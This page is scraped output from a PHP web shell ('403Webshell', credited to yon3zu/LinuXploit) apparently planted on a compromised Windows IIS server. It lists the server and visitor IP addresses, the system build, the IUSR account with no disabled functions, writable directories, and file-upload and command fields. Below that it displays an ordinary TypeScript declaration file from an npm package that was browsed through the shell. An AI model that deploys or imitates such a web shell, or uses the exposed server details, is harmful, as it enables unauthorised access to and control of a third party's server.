403Webshell
Server IP : 185.208.173.17  /  Your IP : 87.236.161.98
Web Server : Microsoft-IIS/10.0
System : Windows NT SRV8576125506 10.0 build 26100 (Windows Server 2016) AMD64
User : IUSR ( 0)
PHP Version : 7.4.13
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/inetpub/wwwroot/parsmega.nuxt/node_modules/@jsonjoy.com/json-pack/lib/ion/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : C:/inetpub/wwwroot/parsmega.nuxt/node_modules/@jsonjoy.com/json-pack/lib/ion/ast.d.ts
import { Import } from './Import';
export interface AstNode<T> {
    readonly val: T;
    readonly len: number;
    byteLength(): number;
}
export declare class NullAstNode implements AstNode<null> {
    readonly val: null;
    readonly len = 1;
    byteLength(): number;
}
export declare class BoolAstNode implements AstNode<boolean> {
    readonly val: boolean;
    readonly len = 1;
    constructor(val: boolean);
    byteLength(): number;
}
export declare class UintAstNode implements AstNode<number> {
    readonly val: number;
    readonly len: number;
    constructor(val: number);
    byteLength(): number;
}
export declare class NintAstNode implements AstNode<number> {
    readonly val: number;
    readonly len: number;
    constructor(val: number);
    byteLength(): number;
}
export declare class FloatAstNode implements AstNode<number> {
    readonly val: number;
    readonly len: number;
    constructor(val: number);
    byteLength(): number;
}
export declare class StrAstNode implements AstNode<string> {
    readonly val: string;
    readonly len: number;
    constructor(val: string);
    byteLength(): number;
}
export declare class BinAstNode implements AstNode<Uint8Array> {
    readonly val: Uint8Array;
    readonly len: number;
    constructor(val: Uint8Array);
    byteLength(): number;
}
export declare class ArrAstNode implements AstNode<AstNode<unknown>[] | null> {
    readonly val: AstNode<unknown>[] | null;
    readonly len: number;
    constructor(val: AstNode<unknown>[] | null);
    byteLength(): number;
}
export declare class ObjAstNode implements AstNode<Map<number, AstNode<unknown>> | null> {
    readonly val: Map<number, AstNode<unknown>> | null;
    readonly len: number;
    constructor(val: Map<number, AstNode<unknown>> | null);
    byteLength(): number;
}
export declare class AnnotationAstNode implements AstNode<AstNode<unknown>> {
    readonly val: AstNode<unknown>;
    readonly annotations: number[];
    readonly len: number;
    readonly annotationLen: number;
    constructor(val: AstNode<unknown>, annotations: number[]);
    byteLength(): number;
}
export declare const toAst: (val: unknown, symbols: Import) => AstNode<unknown>;

Youez - 2016 - github.com/yon3zu
LinuXploit